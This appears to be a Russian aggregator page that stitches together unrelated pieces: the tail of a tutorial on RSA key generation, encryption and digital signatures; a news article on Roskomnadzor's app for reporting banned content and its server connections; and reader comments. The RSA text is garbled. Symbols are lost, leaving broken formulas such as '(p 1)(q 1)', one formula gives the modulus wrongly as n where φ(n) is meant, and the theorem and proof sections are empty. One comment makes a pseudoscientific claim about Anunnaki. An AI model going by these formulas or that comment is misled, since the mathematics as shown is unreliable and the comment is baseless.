  • Функция Эйлера (n) функция, равная количеству натуральных чисел, меньших n и взаимно простых с ним.

Хочу отметить, что на данном этапе подразумевается, что вы знакомы с арифметическими операциями по модулю. Если нет, то здесь можно о них почитать.

Как оно устроено

Прежде, чем окунуться в необъятный мир математики рассмотреть, как именно устроена RSA, обратимся к тому, как работают

Асимметричные криптосистемы

Рассмотрим задачу сохранности содержимого посылки при передаче от отправителя к адресату. Вот картинка с многим полюбившимся Алисой и Бобом:

Алиса хочет передать Бобу посылку. Для начала Боб на своей стороне создает уникальные замок и ключ к нему (открытый и закрытый ключ соответственно). Далее, Боб делится с окружающим миром своим замком, чтобы любой желающий отправить ему посылку смог её закрыть. Поскольку ключ от подобного замка один и находится только у Боба, никто, кроме Боба, просмотреть содержимое после защёлкивания замка не сможет. В конце концов, Алиса с помощью полученного замка закрывает посылку и передаёт Бобу, который открывает её своим ключом. Таким образом устроены асимметричные криптографические системы, которой как раз является RSA.

В схеме передачи посылки все объекты вполне материальны. Однако сообщения, которые мы хотим шифровать, являются ничем иным, как последовательностью бит, которую нельзя "закрыть" на физический замок. Таким образом возникают вопросы: что такое ключ и замок? Как Бобу создать ключи? Каким образом ключи связаны и как с их помощью зашифровать сообщение? Здесь нам поможет математика.

Теперь к математике

Асимметричные криптографические системы основаны на так называемых односторонних функциях с секретом. Под односторонней понимается такая функция я y=f(x), которая легко вычисляется при имеющемся x, но аргумент x при заданном значении функции вычислить сложно. Аналогично, односторонней функцией с секретом называется функция y=f(x, k), которая легко вычисляется при заданном x, причём при заданном секрете k аргумент x по заданному y восстановить просто, а при неизвестном k сложно.

Подобным свойством обладает операция возведения числа в степень по модулю:

c\equiv f(m)\equiv m^e\ mod\ n, \\ m \equiv f^{1}(c) \equiv c^d\ mod\ n, \\ d \equiv e^{-1}\ mod\ n.

Здесь (n) функция Эйлера числа n. Пока условимся, что это работает, далее это будет доказано более строго. Теперь нужно понять, что из это является ключами Боба, а что сообщением. В нашем распоряжении имеются числа c, m, n, e, d.

Давайте посмотрим на первое выражение. Здесь число c получено в результате возведения в степень по модулю числа m. Назовём это действие шифрованием. Тогда становится очевидно, что m выступает в роли открытого текста, а c шифртекста. Результат c зависит от степени e, в которую мы возводим m, и от модуля n, по которому мы получаем результат шифрования. Эту пару чисел (e, n) мы будем называть открытым ключом. Им Алиса будет шифровать сообщение.

Смотрим на второе действие. Здесь d является параметром, с помощью которого мы получаем исходный текст m из шифртекста c. Этот параметр мы назовём закрытым ключом и выдадим его Бобу, чтобы он смог расшифровать сообщение Алисы.

Что есть что разобрались, теперь перейдём к конкретике, а именно генерации ключей Боба. Давайте выберем число n такое, что:

n = pq,

где p и q некоторые разные простые числа. Для такого n функция Эйлера имеет вид:

\varphi(n) = (p 1)(q 1).

Такой выбор n обусловлен следующим. Как вы могли заметить ранее, закрытый ключ можно получить, зная открытый. Зная числа p и q, вычислить функцию Эйлера не является вычислительно сложной задачей, ровно как и нахождение обратного элемента по модулю. Однако в открытом ключе указано именно число n. Таким образом, чтобы вычислить значение функции Эйлера от n (а затем получить закрытый ключ), необходимо решить задачу факторизации, которая является вычислительно сложной задачей для больших n (в современных системах, основанных на RSA, n имеет длину 2048 бит).

Возвращаемся к генерации ключей. Выберем целое число e:

e [3, \varphi(n)1], \\ НОД(e,\varphi(n)) = 1.

Для него вычислим число d:

d e^{1}\ mod\ \varphi(n).

Для отыскания числа, обратного по модулю, можно воспользоваться алгоритмом Евклида.

Мы завершили с этапом генерации ключей. Теперь Боб публикует свой открытый ключ (e, n), прячет закрытый d, а мы переходим к Алисе.

Шифруем, дешифруем...

Возьмём в качестве сообщения число m (m [1, n 1]). Чтобы Алисе зашифровать его, необходимо возвести его в степень e по модулю n. Эти числа идут вместе с открытым ключом Боба:

c m^e\ mod\ n.

Здесь за с обозначен шифртекст, который Алиса будет должна передать Бобу. Отметим также, что c [1, n 1], как и m. Расшифруем шифртекст, возведя его в степень закрытого ключа Боба d:

m c^d\ mod\ n.

А теперь ответим на вопрос, почему m m . Ниже я приведу доказательство данного утверждения, но если оно (доказательство) вам не сильно интересно, то можете его пропустить и просто поверить, что это так.

Доказательство

Здесь нам понадобится теорема Эйлера:

Также полезной будет китайская теорема об остатках:

Теперь докажем, что m m :

Получаем подпись сообщения

Ещё раз напишем две ключевые формулы шифрования и расшифрования соответственно:

c m^e\ mod\ n, \\ m c^d\ mod\ n.

Теперь давайте предположим, что Боб хочет отправить Алисе открытку m от своего имени. У Боба в распоряжении уже имеются два ключа (e, n) и d, которые он сгенерировал по алгоритму, описанному ранее. Поскольку d является закрытым ключом, то можно им воспользоваться как уникальным идентификатором Боба. Давайте "зашифруем" m с помощью d:

s m^d\ mod\ n.

Результат данной операции и есть подпись сообщения Боба. Заметим, что подпись напрямую зависит от подписываемого сообщения, а не только от того, что его подписывает Боб. Далее, Алиса получает сообщение m, подпись s и открытый ключ (e, n). По аналогии с расшифрованием, проверка подписи осуществляется возведением подписи s в степень открытой экспоненты e:

m s^e\ mod\ n.

Если Алиса получила, что m m, то подпись считается правильной.

Дочитавших до этого места хочу поздравить с получением первой цифровой подписи "на бумаге"!

Подпись документов

Рассмотренный алгоритм получения подписи изящен и прост в осознании, однако операция возведения в степень несколько "мешается". Наша текущая задача подписать объёмный документ. Чтобы сэкономить время, мы не будем подписывать содержимое документа, а прибегнем к помощи хэш-функций (если вы не знаете, что такое хэш-функция, рекомендую почитать википедию). Скажу лишь то, что выходная последовательность хэш-функции имеет небольшую (по сравнению с размером ключей) длину, а также по имеющемуся хэшу нельзя однозначно восстановить исходные данные.

На картинках наглядно показано, в какой момент мы используем хэширование. Создание подписи:

Проверка подписи:

В качестве хэш-функции можно использовать SHA-256, как это сделано, например, в PGP. По теме практического создания электронной подписи с использованием PGP на хабре уже написана статья, поэтому на этом месте имеет смысл поставить точку и перейти к заключению.

Заключение

Вот мы и прошли все стадии создания электронной подписи, начиная с простой модульной арифметики и заканчивая, собственно, получением подписи. Обладая этими знаниями, вы можете попробовать перевести их на ваш любимый язык программирования и написать свою защищенную аську, например. В том, как именно их применить, вас ограничит только ваше воображение.

Отмечу, что другие существующие алгоритмы создания ЭП основаны на схожих принципах, поэтому надеюсь, что после прочтения этой статьи вам будет проще разобраться в них. "Следующей по сложности" я обозначу криптосистему Эль-Гамаля, но о ней уже не в этом посте.

Спасибо за внимание!

Источники

  1. Handbook of Applied Cryptography by A. Menezes, P. van Oorschot and S. Vanstone

  2. Криптографические методы защиты информации: учеб. пособие / С. М. Владимиров, Э. М. Габидулин, А. И. Колыбельников, А. С. Кшевецкий; под ред. А. В. Уривского. М.: МФТИ, 2016

  3. Маховенко Е. Б. Теоретико-числовые методы в криптографии М.: Гелиос АРВ, 2006.

  4. NIST Special Publication 800-57 Part 3 Revision 1

  5. Молдовян Н.А. Теоретический минимум и алгоритмы цифровой подписи. СПб.: БХВ-Петербург, 2010. - Учебное пособие

Подробнее..

Приложение Роскомнадзора кому полезно и насколько хорошо защищает данные

12.03.2021 14:20:14 | Автор: admin

В феврале 2021 года РКН представил собственное приложение для защиты интернет-пользователей от социально опасного контента. Сервис стремится к мультифункциональности и в скором времени планирует значительно расширить инструментарий.

Функционал: сегодня и завтра.

Созданный в РКН цифровой инструмент повысит эффективность защиты интернет-пользователей от вредоносного контента. Мобильное приложение сделает более оперативным механизм удаления из Сети противоправной информации, имеющей отношение к детской порнографии, пропаганде суицидов, наркотических средств и т.д. Такие материалы сегодня включаются в Единыйреестрзапрещенных сайтов.

До февраля 2021 года пользователи могли подать жалобу на противоправный контент только на сайте РКН. Кстати, по этому каналу обратной связи с ноября 2012 года получено более 2,7 млн сообщений об информации в интернете, нарушающей российское законодательство.

За восемь с небольшим лет в ведомство поступило и рассмотрено более 315 тыс. сообщений о детской порнографии, почти 643 тыс. о незаконном обороте наркотиков, 211,5 тыс. о призывах к самоубийству, около 1,5 млн о нелегальных азартных играх.

В мобильном приложении помимо подачи жалобы на запрещенный контент также можно будет:

  • отследить этапы ее рассмотрения;

  • проверить, ограничен ли доступ к интернет-ресурсам и т.д.

Также инструменты сервиса позволяют провайдерам хостинга и владельцам сайта своевременно получать сведения от Роскомнадзора в отношении их сайтов в части размещенного на них запрещенного контента.

По словам одного из создателей проекта, руководителя подразделения проведения экспериментальных работ Научно-технического центра ФГУП Главный радиочастотный центр (ГРЧЦ) Владислава Минакова, в ближайшее время будут расширены опции приложения:

  • расширение функционала в части реализации кабинета СМИ и вещателя;

  • введение новых групп пользователей (учредители СМИ, вещатели, главные редакторы);

  • реализация возможностей оперативного получения используемой в деятельности СМИ информации;

  • расширение способов доставки до поднадзорных лиц юридически значимых документов.

Предложения пользователей учитываются.

Увеличение функциональных возможностей приложения будет основано не только в связи с новыми полномочиями подразделений РКН, но и на основании опыта подписчиков.
Обратная связь с ними сегодня осуществляется посредством отзывов в магазинахGoogle PlayиApp Store, а также по электронной почте ermp@grfc.ru.

В. Минаков сообщил, что уже поступил ряд конструктивных предложений от пользователей по новым опциям. Это, в частности:

1) адаптация интерфейса;

2) рассмотрение возможности по расширению способов авторизации (по номеру телефона, госуслуги Москвы mos.ru).

Пока доступ к сервису РКН осуществляется через Единую систему идентификации и аутентификации (портал Госуслуг) и не требует дополнительной регистрации.
Начавшееся в феврале бета-тестирование приложения будет проходить до возможного выявления и устранения проблем в его работе. Вероятно, стабильный релиз будет уже в марте, рассказал эксперт ГРЧЦ. Также он сообщил, что обновления сервиса выходят по мере необходимости. За период бета-тестирования было сделано несколько таких доработок приложения. Масштабные обновления же с новым функционалом планируются 1-2 раза в год.

Запуск такого мобильного ПО это один из элементов цифровой трансформации, которую РКН активно ведет, начиная с 2020 года, в соответствии с утвержденной в декабре 2020 года ведомственной стратегией.

Насколько защищена конфиденциальность.

Мобильное приложение РКН было написано с нуля, без применения зарубежных решений, уточнил В.Минаков.

В ходе разработки было использовано много отечественных IT-кейсов, например, модуль шифрования openssl-gost.

Сервис, по словам его автора, отвечает всем современным требованиям и соединил многие актуальные технологии.

Разработчик отметил, что в программе сделан особый упор на безопасность.

Перед запуском был проведен полный внутренний аудит самого приложения и серверных компонентов, произведена имитация DoS и DDoS атак.

Конфиденциальность данных пользователей также в приоритете. Мобильный сервис поддерживает минимально необходимое количество соединений, которые устанавливаются:

  • с сервером приложения это касается обновления данных и статусов;

  • сервером Госуслуг (авторизация);

  • сервером Firebase Cloud Messaging (для push-уведомлений;

  • сервером Я.Метрика. Данное взаимодействие будет только в период бета-тестирования, в дальнейшем функционал будет отключен.

Подробнее..

Категории

Последние комментарии

  • Имя: Murshin
    13.06.2024 | 14:01
    Нейросеть-это мозг вселенной.Если к ней подключиться,то можно получить все знания,накопленные Вселенной,но этому препятствуют аннуннаки.Аннуннаки нас от неё отгородили,установив в головах барьер. Подр Подробнее..
  • Имя: Макс
    24.08.2022 | 11:28
    Я разраб в IT компании, работаю на арбитражную команду. Мы работаем с приламы и сайтами, при работе замечаются постоянные баны и лаги. Пацаны посоветовали сервис по анализу исходного кода,https://app Подробнее..
  • Имя: 9055410337
    20.08.2022 | 17:41
    поможем пишите в телеграм Подробнее..
  • Имя: sabbat
    17.08.2022 | 20:42
    Охренеть.. это просто шикарная статья, феноменально круто. Большое спасибо за разбор! Надеюсь как-нибудь с тобой связаться для обсуждений чего-либо) Подробнее..
  • Имя: Мария
    09.08.2022 | 14:44
    Добрый день. Если обладаете такой информацией, то подскажите, пожалуйста, где можно найти много-много материала по Yggdrasil и его уязвимостях для написания диплома? Благодарю. Подробнее..
© 2006-2024, personeltest.ru